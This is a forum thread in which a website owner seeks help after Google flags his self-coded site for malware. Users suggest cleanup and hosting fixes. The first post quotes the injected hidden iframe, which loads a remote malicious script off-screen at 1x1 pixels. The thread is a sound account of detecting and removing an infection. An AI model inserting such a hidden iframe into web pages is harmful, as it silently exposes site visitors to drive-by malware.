Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie
Hi there,
There is an issue with role permissions that is being worked on at the moment.
If you are having trouble with access or permissions on regional forums please post here to get access: https://www.boards.ie/discussion/2058365403/you-do-not-have-permission-for-that#latest

Malware on my Website!

  • 18-06-2013 8:05am
    #1
    Registered Users, Registered Users 2 Posts: 146 ✭✭


    Today I got an email from google informing me that my website has malware. I coded the site myself, it is simple there is no possibility of me putting in malware. I am with digiweb.

    google has a This site may harm your computer tag when serching for my site which is most distressing to see.

    My website is: dublinrolfing.com

    Sucuri sitecheck gives me the following

    Hidden Iframes.
    Details: http://sucuri.net/malware/entry/MW:IFRAME:HD202
    <iframe src=http://ajaxfamilies.org/go.php?sid=3 width=1 height=1 style="visibility:hidden;position:absolute;top:-10;left:-1337;">


    Can I assume that my site was hacked? and what can I do about this?

    I want to log into digiweb services, delete my site and re build it. But digiweb have migrated to different software and I can not find out how to do ftp access. The irony hackers can access my site and I cant.

    Could this be something to do with the digiweb migration.


    Please help.


Comments

  • Registered Users, Registered Users 2 Posts: 146 ✭✭kipple


    Changed passwords.

    I removed the Google Analytics web tracking code as I didnt understand it as so it could be infected. There was a unknown .php file which I removed.

    Re scanned with Sucuri SiteCheck and it came up clean. Re submitted to google.


  • Posts: 0 [Deleted User]


    Hi, If you coded it yourself then there is a high probability its vulnerable. Do you use wordpress any anything along those lines?

    Google launched an initiative in the past year to actively look for and contact the owners of websites it thinks have been tampered with, it's actually quite impressive... google it and you'll find information about it.

    You did the correct thing - change the password.

    I can't seem to access your site? Did you take it down?


  • Closed Accounts Posts: 9,700 ✭✭✭tricky D


    This might help depending on what happened:

    Get in touch with digiweb for ftp details.

    Go through every file and remove any offending iframe calls and any other dodgy script calls which might also have been injected.
    Scour every directory for .htaccess files which include dodgy redirects.
    Resubmit for review to Google through webmaster tools and at https://www.stopbadware.org/request-review

    Try in future to use sftp with a very strong password, keep stuff like WordPress or the like up to date and backup your files properly.

    Give your own machine a good cleaning with the likes of malware malwarebytes (mbam) and some other utils. Also have a look at advice here: http://www.boards.ie/vbulletin/showthread.php?t=2055274237


  • Registered Users, Registered Users 2 Posts: 146 ✭✭kipple


    Thanks for the advice.

    Yes my site is down, not sure why. I can not log in to ftp so could be a digiweb problem?

    On passwords digiweb have a 10 character maximum. Which should be fine unless the database got hacked.

    I found this arstechnica piece fascinating:

    http://arstechnica.com/security/2013/05/how-crackers-make-minced-meat-out-of-your-passwords/2/


  • Posts: 0 [Deleted User]


    It's a good article, length and complexity are key.. people think it's its random then it doesn't need to be long.

    The fact that your site is down is a little concerning.... I don't think Digiweb would be down... best contact them and find out if they're experiencing problems.


  • Advertisement
  • Site Banned Posts: 2 ..87df lk09_.


    dfagfgasfgdfagfgasfgdfagfgasfgdfagfgasfgdfagfgasfgdfagfgasfgdfagfgasfgdfagfgasfgdfagfgasfgdfagfgasfgdfagfgasfgdfagfgasfgdfagfgasfg


  • Registered Users, Registered Users 2 Posts: 48 Jane Blonde


    this might be an important update to this post but it's starting to look like the problem is with Digiweb and not just your site. I have seen other sites also hosted on digiweb web3.host.ie that have the same symptoms.

    Take a look at this article:
    http://blog.sucuri.net/2013/06/new-apache-module-injection.html

    Any techies that can shed some light here?


  • Registered Users, Registered Users 2 Posts: 146 ✭✭kipple



    Yes that is it!! I moved providers as Digiweb refused to acknowledge that it was their problem. Scary piece of malware. My site was infected with this for over a week and my site was still not blocked by google.

    So if it was getting around google blocking my site so it potentially means when people post links on boards they could be infected.


  • Registered Users, Registered Users 2 Posts: 5 fixmypc.ie


    @kipple: I may be able to help you, am a web developer. Can you please tell me what kind of website is it? Static or Dynamic? I mean does the pages end with .htm/ .html or with .php? Do you have backend where the content etc can be updated? Is it built on some framework like wordpress, zoomla etc?

    i am sorry for all these questions, just trying to get a feel of the environment. :)


  • Registered Users, Registered Users 2 Posts: 48 Jane Blonde


    Hi Kipple, it's built on Xoops, are you familar?


  • Advertisement
  • Registered Users, Registered Users 2 Posts: 146 ✭✭kipple


    fixmypc,

    Thank you for the offer!
    The site was all html, I coded it myself using notepad, and no php and no backend and no framework. I have moved provider and the problem has gone.


Advertisement